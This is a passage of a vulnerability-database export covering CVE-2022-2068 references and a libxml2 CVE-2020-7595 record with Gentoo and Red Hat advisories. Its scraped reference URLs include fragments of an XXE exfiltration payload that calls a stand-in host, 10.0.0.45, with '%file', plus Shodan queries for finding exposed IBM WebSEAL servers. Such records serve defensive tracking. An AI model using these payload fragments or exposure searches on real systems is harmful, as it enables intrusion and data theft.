"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0891"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1184"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-25255"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21619"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-42004"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1355"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36516"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-28893"
},
{
"trust": 0.1,
"url": "https://pierrekim.github.io/advisories/2024-ibmsecurity.txt"
},
{
"trust": 0.1,
"url": "https://test-runtime/sps/oauth/oauth20/authorize?client_id=testauthenticatorclient\u0026response_type=code\u0026scope=mmfaauthn\""
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/xmlschema\""
},
{
"trust": 0.1,
"url": "https://github.com/jbeder/yaml-cpp/pull/807."
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/"
},
{
"trust": 0.1,
"url": "https://github.com/client9/libinjection/issues/124."
},
{
"trust": 0.1,
"url": "https://dsc-02.test.lan:8443/"
},
{
"trust": 0.1,
"url": "https://github.com/ibm-security/ibmsecurity/issues/416#issuecomment-2032110397."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-30997"
},
{
"trust": 0.1,
"url": "https://www.digicert.com,"
},
{
"trust": 0.1,
"url": "https://enroll-url/mga/sps/mga/user/mgmt/html/device/device_selection.html`."
},
{
"trust": 0.1,
"url": "http://10.0.0.45/?x=%file`,"
},
{
"trust": 0.1,
"url": "https://test-runtime/`)."
},
{
"trust": 0.1,
"url": "https://internet-faced-website/mga/sps/mmfa/user/mgmt/details"
},
{
"trust": 0.1,
"url": "https://test-runtime/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=testauthenticatorclient\u0026code=0nxkrywnfzkcoa5wftzqdk5mkjpv9y`"
},
{
"trust": 0.1,
"url": "https://127.0.0.1:$port"
},
{
"trust": 0.1,
"url": "http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e0\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/soap-env:body\u003e\u003c/soap-env:envelope\u003e\u0027"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7106586"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38370"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7155356:"
},
{
"trust": 0.1,
"url": "https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt"
},
{
"trust": 0.1,
"url": "https://github.com/jbeder/yaml-cpp/pull/807/files/dbd5ac094622ef3b3951e71c31f59e02c930dc4b,"
},
{
"trust": 0.1,
"url": "https://www.zlib.org)"
},
{
"trust": 0.1,
"url": "https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.7?topic=support-docker-image-verify-access-runtime,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-31006"
},
{
"trust": 0.1,
"url": "https://info.domain.tld/mga/sps/authsvc?policyid=urn:ibm:security:authentication:asf:qrcode_response\""
},
{
"trust": 0.1,
"url": "https://repo.symas.com/repo/rpm/sofl/rhel8"
},
{
"trust": 0.1,
"url": "https://enroll-url/mga/sps/mmfa/user/mgmt/details`"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications:"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-31004"
},
{
"trust": 0.1,
"url": "https://pierrekim.github.io/blog/2024-11-01-ibmsecurity-4-vulnerabilities.html"
},
{
"trust": 0.1,
"url": "https://www.shodan.io/search?query=cp%3d%22non+cur+otpi+our+nor+uni%22,"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/ssprek_10.0.0/com.ibm.isva.doc/config/reference/ref_isamcfg_wga_worksheet.htm:"
},
{
"trust": 0.1,
"url": "http://10.0.0.45/."
},
{
"trust": 0.1,
"url": "https://www.shodan.io/search?query=http.favicon.hash%3a-2069014068,"
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/xmlschema-instance\"\u003e\u003csoap-env:body\u003e\u003cns1:ping"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7158790:"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7106586:"
},
{
"trust": 0.1,
"url": "http://mirror.centos.org/centos/8-stream/appstream/x86_64/os"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-32329"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38267"
},
{
"trust": 0.1,
"url": "https://www.openssl.org),"
},
{
"trust": 0.1,
"url": "https://github.com/jbeder/yaml-cpp/pull/807"
},
{
"trust": 0.1,
"url": "https://info.domain.tld/scim/me\","
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/x"
},
{
"trust": 0.1,
"url": "http://sms.am.tivoli.com\"\u003e\u003cns1:something\u003e\u0026xxe;\u003c/ns1:something\u003e\u003c/ns1:ping\u003e\u003c/soap-env:body\u003e\u003c/soap-env:envelope\u003e\u0027"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/security-bulletin-vulnerabilities-exist-ibm-data-risk-manager-cve-2020-4427-cve-2020-4428-cve-2020-4429-and-cve-2020-4430."
},
{
"trust": 0.1,
"url": "https://dsc.test.lan:8443/dsess/services/dsess"
},
{
"trust": 0.1,
"url": "https://enroll-url/mga/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=testauthenticatorclient\u0026code=0nxkrywnfzkcoa5wftzqdk5mkjpv9y"
},
{
"trust": 0.1,
"url": "https://github.com/ibm-security/ibmsecurity/issues/416)"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-30998"
},
{
"trust": 0.1,
"url": "https://dsc-02.test.lan:8443"
},
{
"trust": 0.1,
"url": "http://www.w3.org/2001/xmlschema-instance\"\u003e"
},
{
"trust": 0.1,
"url": "https://repo.symas.com/repo/gpg/rpm-gpg-key-symas-com-signing-key"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7106586,"
},
{
"trust": 0.1,
"url": "https://repo.symas.com/configs/sofl/rhel8/sofl.repo"
},
{
"trust": 0.1,
"url": "http://www.chambersign.org,o=ac"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1"
},
{
"trust": 0.1,
"url": "https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html`."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38368"
},
{
"trust": 0.1,
"url": "https://xerces.apache.org/xerces-c/secadv.html)."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-31001"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=overview-introduction-security-verify-access"
},
{
"trust": 0.1,
"url": "https://mirrors.fedoraproject.org/metalink?repo=updates-released-f33\u0026arch=x86_64"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters"
},
{
"trust": 0.1,
"url": "https://github.com/jbeder/yaml-cpp."
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7145400:"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-31005"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-32328"
},
{
"trust": 0.1,
"url": "https://www.ibm.com)"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38371),"
},
{
"trust": 0.1,
"url": "http://mirror.centos.org/centos/8-stream/appstream/x86_64/os/packages/"
},
{
"trust": 0.1,
"url": "https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]"
},
{
"trust": 0.1,
"url": "https://github.com/spiderlabs/modsecurity/issues/1412)"
},
{
"trust": 0.1,
"url": "https://info.domain.tld/scim/me?attributes=urn:ietf:params:scim:schemas:extension:isam:1.0:mmfa:transaction:transactionspending,urn:ietf:params:scim:schemas:extension:isam:1.0:mmfa:transaction:attributespending\","
},
{
"trust": 0.1,
"url": "http://schemas.xmlsoap.org/soap/envelope/\""
},
{
"trust": 0.1,
"url": "http://10.0.0.45/?x=%file;\u0027\u003e\"\u003e"
},
{
"trust": 0.1,
"url": "https://repo.symas.com/configs/sofl/rhel8/sofl.repo`:"
},
{
"trust": 0.1,
"url": "https://dsc-02.test.lan:8443/dsess/services/dsess"
},
{
"trust": 0.1,
"url": "https://mirrors.fedoraproject.org/metalink?repo=fedora-33\u0026arch=x86_64"
},
{
"trust": 0.1,
"url": "https://github.com/ibm-security/ibmsecurity/issues/416"
},
{
"trust": 0.1,
"url": "https://url/sps/mga/user/mgmt/html/device/device_selection.html`"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-32330"
},
{
"trust": 0.1,
"url": "https://test-runtime/sps/mga/user/mgmt/grant"
},
{
"trust": 0.1,
"url": "https://curl.haxx.se/docs/sslcerts.html"
},
{
"trust": 0.1,
"url": "https://github.com/ibm-security/ibmsecurity/issues/416."
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7145400"
},
{
"trust": 0.1,
"url": "http://mirror.centos.org/centos/8-stream/baseos/x86_64/os"
},
{
"trust": 0.1,
"url": "https://www.digicert.com,o=digicert"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/6989653."
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1;"
},
{
"trust": 0.1,
"url": "http://sms.am.tivoli.com\"\u003e"
},
{
"trust": 0.1,
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1410277"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7155356"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters;"
},
{
"trust": 0.1,
"url": "http://www.w3.org/tr/html4/loose.dtd\"\u003e"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:5818)."
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications"
},
{
"trust": 0.1,
"url": "https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp\u0026hl=en)"
},
{
"trust": 0.1,
"url": "https://www.shodan.io/search?query=webseal,"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7145400."
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7155356."
},
{
"trust": 0.1,
"url": "https://bug1325532.bmoattachments.org/attachment.cgi?id=8844281"
},
{
"trust": 0.1,
"url": "http://10.0.0.45/dtd.xml\"\u003e"
},
{
"trust": 0.1,
"url": "http://10.0.0.45/dtd.xml`,"
},
{
"trust": 0.1,
"url": "https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/docs/en/sva/10.0.7,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-38369"
},
{
"trust": 0.1,
"url": "https://github.com/ibm-security/ibmsecurity/issues/416)."
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7147932."
},
{
"trust": 0.1,
"url": "https://test-runtime/sps/mga/user/mgmt/otp/totp"
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7145828."
},
{
"trust": 0.1,
"url": "https://www.ibm.com/support/pages/node/7158790"
},
{
"trust": 0.1,
"url": "https://twitter.com/cvenew)"
},
{
"trust": 0.1,
"url": "https://test-runtime/sps/mmfa/user/mgmt/authenticators"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-2068"
},
{
"db": "PACKETSTORM",
"id": "168022"
},
{
"db": "PACKETSTORM",
"id": "169396"
},
{
"db": "PACKETSTORM",
"id": "168112"
},
{
"db": "PACKETSTORM",
"id": "170741"
},
{
"db": "PACKETSTORM",
"id": "170196"
},
{
"db": "PACKETSTORM",
"id": "170165"
},
{
"db": "PACKETSTORM",
"id": "175432"
},
{
"db": "PACKETSTORM",
"id": "170179"
},
{
"db": "PACKETSTORM",
"id": "182466"
},
{
"db": "NVD",
"id": "CVE-2022-2068"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULMON",
"id": "CVE-2022-2068",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168022",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "169396",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "168112",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170741",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170196",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170165",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "175432",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "170179",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "182466",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2022-2068",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2022-06-21T00:00:00",
"db": "VULMON",
"id": "CVE-2022-2068",
"ident": null
},
{
"date": "2022-08-10T15:50:41",
"db": "PACKETSTORM",
"id": "168022",
"ident": null
},
{
"date": "2022-06-28T19:12:00",
"db": "PACKETSTORM",
"id": "169396",
"ident": null
},
{
"date": "2022-08-19T15:03:34",
"db": "PACKETSTORM",
"id": "168112",
"ident": null
},
{
"date": "2023-01-26T15:29:09",
"db": "PACKETSTORM",
"id": "170741",
"ident": null
},
{
"date": "2022-12-12T23:02:21",
"db": "PACKETSTORM",
"id": "170196",
"ident": null
},
{
"date": "2022-12-08T21:28:21",
"db": "PACKETSTORM",
"id": "170165",
"ident": null
},
{
"date": "2023-10-31T13:11:25",
"db": "PACKETSTORM",
"id": "175432",
"ident": null
},
{
"date": "2022-12-09T14:52:40",
"db": "PACKETSTORM",
"id": "170179",
"ident": null
},
{
"date": "2024-11-04T16:28:12",
"db": "PACKETSTORM",
"id": "182466",
"ident": null
},
{
"date": "2022-06-21T15:15:09.060000",
"db": "NVD",
"id": "CVE-2022-2068",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-11-07T00:00:00",
"db": "VULMON",
"id": "CVE-2022-2068",
"ident": null
},
{
"date": "2025-11-03T22:15:58.023000",
"db": "NVD",
"id": "CVE-2022-2068",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "175432"
}
],
"trust": 0.1
},
"title": {
"_id": null,
"data": "Red Hat Security Advisory 2022-6024-01",
"sources": [
{
"db": "PACKETSTORM",
"id": "168022"
}
],
"trust": 0.1
},
"type": {
"_id": null,
"data": "arbitrary",
"sources": [
{
"db": "PACKETSTORM",
"id": "169396"
},
{
"db": "PACKETSTORM",
"id": "175432"
}
],
"trust": 0.2
}
}
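The per-source "trust" values in the record above follow a simple pattern: each contributing database entry carries 0.1, and the field-level totals (for example the 0.2 on the "type" field, backed by two PACKETSTORM sources) are the sum. A minimal sketch of that aggregation, assuming equal per-source weight — the rule is inferred from the data shown here, not documented by VARIoT:

```python
# Sketch of the apparent trust aggregation in the record above:
# each source database contributes a fixed weight (0.1 here), and a
# field's "trust" is the sum over its sources. Inferred from the
# data, not taken from any VARIoT specification.
def aggregate_trust(sources, per_source_trust=0.1):
    return round(per_source_trust * len(sources), 1)

# The "type" field above lists two PACKETSTORM sources and trust 0.2:
type_sources = [
    {"db": "PACKETSTORM", "id": "169396"},
    {"db": "PACKETSTORM", "id": "175432"},
]
print(aggregate_trust(type_sources))  # 0.2
```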
VAR-202001-1866
Vulnerability from variot - Updated: 2026-03-09 20:18
xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation. It was discovered that libxml2 incorrectly handled certain XML files. (CVE-2019-19956, CVE-2020-7595). Bugs fixed (https://bugzilla.redhat.com/):
1914774 - CVE-2021-20178 ansible: user data leak in snmp_facts module
1915808 - CVE-2021-20180 ansible module: bitbucket_pipeline_variable exposes secured values
1916813 - CVE-2021-20191 ansible: multiple modules expose secured values
1925002 - CVE-2021-20228 ansible: basic.py no_log with fallback option
1939349 - CVE-2021-3447 ansible: multiple modules expose secured values
-
Gentoo Linux Security Advisory GLSA 202010-04
https://security.gentoo.org/
Severity: Normal
Title: libxml2: Multiple vulnerabilities
Date: October 20, 2020
Bugs: #710748
ID: 202010-04
Synopsis
Multiple vulnerabilities have been found in libxml2, the worst of which could result in a Denial of Service condition.
Background
libxml2 is the XML (eXtended Markup Language) C parser and toolkit initially developed for the Gnome project.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/libxml2 < 2.9.10 >= 2.9.10
Description
Multiple vulnerabilities have been discovered in libxml2. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All libxml2 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-libs/libxml2-2.9.10"
References
[ 1 ] CVE-2019-20388 https://nvd.nist.gov/vuln/detail/CVE-2019-20388
[ 2 ] CVE-2020-7595 https://nvd.nist.gov/vuln/detail/CVE-2020-7595
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202010-04
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2020 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
https://creativecommons.org/licenses/by-sa/2.5
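The GLSA resolution above amounts to a version comparison: installed libxml2 below 2.9.10 is in the vulnerable range, 2.9.10 and later are unaffected. A minimal sketch of that check, assuming plain dotted numeric version strings (real Portage version syntax is richer than this):

```python
# Sketch of the version check behind the GLSA above: an installed
# libxml2 older than the fixed release 2.9.10 is vulnerable.
# Plain tuple comparison of dotted numeric components; suffixes
# like "_rc1" or "-r2" are not handled in this sketch.
def is_vulnerable(installed, fixed="2.9.10"):
    to_tuple = lambda v: tuple(int(x) for x in v.split("."))
    return to_tuple(installed) < to_tuple(fixed)

print(is_vulnerable("2.9.9"))   # True
print(is_vulnerable("2.9.10"))  # False
```

Note that naive string comparison would get this wrong ("2.9.9" > "2.9.10" lexicographically), which is why the components are compared numerically.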
The compliance-operator image updates are now available for OpenShift Container Platform 4.6.
Bug Fix(es):
-
Aggregator pod tries to parse ConfigMaps without results (BZ#1899479)
-
The compliancesuite object returns error with ocp4-cis tailored profile (BZ#1902251)
-
The compliancesuite does not trigger when there are multiple rhcos4 profiles added in scansettingbinding object (BZ#1902634)
-
[OCP v46] Not all remediations get applied through machineConfig although the status of all rules shows Applied in ComplianceRemediations object (BZ#1907414)
-
The profile parser pod deployment and associated profiles should get removed after upgrade the compliance operator (BZ#1908991)
-
Applying the "rhcos4-moderate" compliance profile leads to Ignition error "something else exists at that path" (BZ#1909081)
-
[OCP v46] Always update the default profilebundles on Compliance operator startup (BZ#1909122)
-
Solution:
For OpenShift Container Platform 4.6 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html. Bugs fixed (https://bugzilla.redhat.com/):
1899479 - Aggregator pod tries to parse ConfigMaps without results
1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service
1902251 - The compliancesuite object returns error with ocp4-cis tailored profile
1902634 - The compliancesuite does not trigger when there are multiple rhcos4 profiles added in scansettingbinding object
1907414 - [OCP v46] Not all remediations get applied through machineConfig although the status of all rules shows Applied in ComplianceRemediations object
1908991 - The profile parser pod deployment and associated profiles should get removed after upgrade the compliance operator
1909081 - Applying the "rhcos4-moderate" compliance profile leads to Ignition error "something else exists at that path"
1909122 - [OCP v46] Always update the default profilebundles on Compliance operator startup
- Description:
Red Hat 3scale API Management delivers centralized API management features through a distributed, cloud-hosted layer. It includes built-in features to help in building a more successful API program, including access control, rate limits, payment gateway integration, and developer experience tools.
This advisory is intended to be used with container images for Red Hat 3scale API Management 2.10.0. Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic
1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
- Solution:
For information on upgrading Ansible Tower, reference the Ansible Tower Upgrade and Migration Guide: https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/index.html
- Description:
Red Hat OpenShift Do (odo) is a simple CLI tool for developers to create, build, and deploy applications on OpenShift. The odo tool is completely client-based and requires no server within the OpenShift cluster for deployment. It detects changes to local code and deploys it to the cluster automatically, giving instant feedback to validate changes in real-time. It supports multiple programming languages and frameworks.
The advisory addresses the following issues:
-
Re-release of odo-init-image 1.1.3 for security updates
-
Solution:
Download and install a new CLI binary by following the instructions linked from the References section. Bugs fixed (https://bugzilla.redhat.com/):
1832983 - Release of 1.1.3 odo-init-image
-
8) - aarch64, ppc64le, s390x, x86_64
-
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: libxml2 security and bug fix update
Advisory ID: RHSA-2020:3996-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2020:3996
Issue date: 2020-09-29
CVE Names: CVE-2019-19956 CVE-2019-20388 CVE-2020-7595
====================================================================
1. Summary:
An update for libxml2 is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
The libxml2 library is a development toolbox providing the implementation of various XML standards.
Security Fix(es):
-
libxml2: memory leak in xmlParseBalancedChunkMemoryRecover in parser.c (CVE-2019-19956)
-
libxml2: memory leak in xmlSchemaPreRun in xmlschemas.c (CVE-2019-20388)
-
libxml2: infinite loop in xmlStringLenDecodeEntities in some end-of-file situations (CVE-2020-7595)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.9 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The desktop must be restarted (log out, then log back in) for this update to take effect.
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: libxml2-2.9.1-6.el7.5.src.rpm
x86_64: libxml2-2.9.1-6.el7.5.i686.rpm libxml2-2.9.1-6.el7.5.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-python-2.9.1-6.el7.5.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-devel-2.9.1-6.el7.5.i686.rpm libxml2-devel-2.9.1-6.el7.5.x86_64.rpm libxml2-static-2.9.1-6.el7.5.i686.rpm libxml2-static-2.9.1-6.el7.5.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: libxml2-2.9.1-6.el7.5.src.rpm
x86_64: libxml2-2.9.1-6.el7.5.i686.rpm libxml2-2.9.1-6.el7.5.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-python-2.9.1-6.el7.5.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-devel-2.9.1-6.el7.5.i686.rpm libxml2-devel-2.9.1-6.el7.5.x86_64.rpm libxml2-static-2.9.1-6.el7.5.i686.rpm libxml2-static-2.9.1-6.el7.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: libxml2-2.9.1-6.el7.5.src.rpm
ppc64: libxml2-2.9.1-6.el7.5.ppc.rpm libxml2-2.9.1-6.el7.5.ppc64.rpm libxml2-debuginfo-2.9.1-6.el7.5.ppc.rpm libxml2-debuginfo-2.9.1-6.el7.5.ppc64.rpm libxml2-devel-2.9.1-6.el7.5.ppc.rpm libxml2-devel-2.9.1-6.el7.5.ppc64.rpm libxml2-python-2.9.1-6.el7.5.ppc64.rpm
ppc64le: libxml2-2.9.1-6.el7.5.ppc64le.rpm libxml2-debuginfo-2.9.1-6.el7.5.ppc64le.rpm libxml2-devel-2.9.1-6.el7.5.ppc64le.rpm libxml2-python-2.9.1-6.el7.5.ppc64le.rpm
s390x: libxml2-2.9.1-6.el7.5.s390.rpm libxml2-2.9.1-6.el7.5.s390x.rpm libxml2-debuginfo-2.9.1-6.el7.5.s390.rpm libxml2-debuginfo-2.9.1-6.el7.5.s390x.rpm libxml2-devel-2.9.1-6.el7.5.s390.rpm libxml2-devel-2.9.1-6.el7.5.s390x.rpm libxml2-python-2.9.1-6.el7.5.s390x.rpm
x86_64: libxml2-2.9.1-6.el7.5.i686.rpm libxml2-2.9.1-6.el7.5.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-devel-2.9.1-6.el7.5.i686.rpm libxml2-devel-2.9.1-6.el7.5.x86_64.rpm libxml2-python-2.9.1-6.el7.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: libxml2-debuginfo-2.9.1-6.el7.5.ppc.rpm libxml2-debuginfo-2.9.1-6.el7.5.ppc64.rpm libxml2-static-2.9.1-6.el7.5.ppc.rpm libxml2-static-2.9.1-6.el7.5.ppc64.rpm
ppc64le: libxml2-debuginfo-2.9.1-6.el7.5.ppc64le.rpm libxml2-static-2.9.1-6.el7.5.ppc64le.rpm
s390x: libxml2-debuginfo-2.9.1-6.el7.5.s390.rpm libxml2-debuginfo-2.9.1-6.el7.5.s390x.rpm libxml2-static-2.9.1-6.el7.5.s390.rpm libxml2-static-2.9.1-6.el7.5.s390x.rpm
x86_64: libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-static-2.9.1-6.el7.5.i686.rpm libxml2-static-2.9.1-6.el7.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: libxml2-2.9.1-6.el7.5.src.rpm
x86_64: libxml2-2.9.1-6.el7.5.i686.rpm libxml2-2.9.1-6.el7.5.x86_64.rpm libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-devel-2.9.1-6.el7.5.i686.rpm libxml2-devel-2.9.1-6.el7.5.x86_64.rpm libxml2-python-2.9.1-6.el7.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: libxml2-debuginfo-2.9.1-6.el7.5.i686.rpm libxml2-debuginfo-2.9.1-6.el7.5.x86_64.rpm libxml2-static-2.9.1-6.el7.5.i686.rpm libxml2-static-2.9.1-6.el7.5.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2019-19956 https://access.redhat.com/security/cve/CVE-2019-20388 https://access.redhat.com/security/cve/CVE-2020-7595 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.9_release_notes/index
8. Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIVAwUBX3OgG9zjgjWX9erEAQg9vhAAiDkPkj6VlpMKDvgVUY4eU83p4bCnZqos
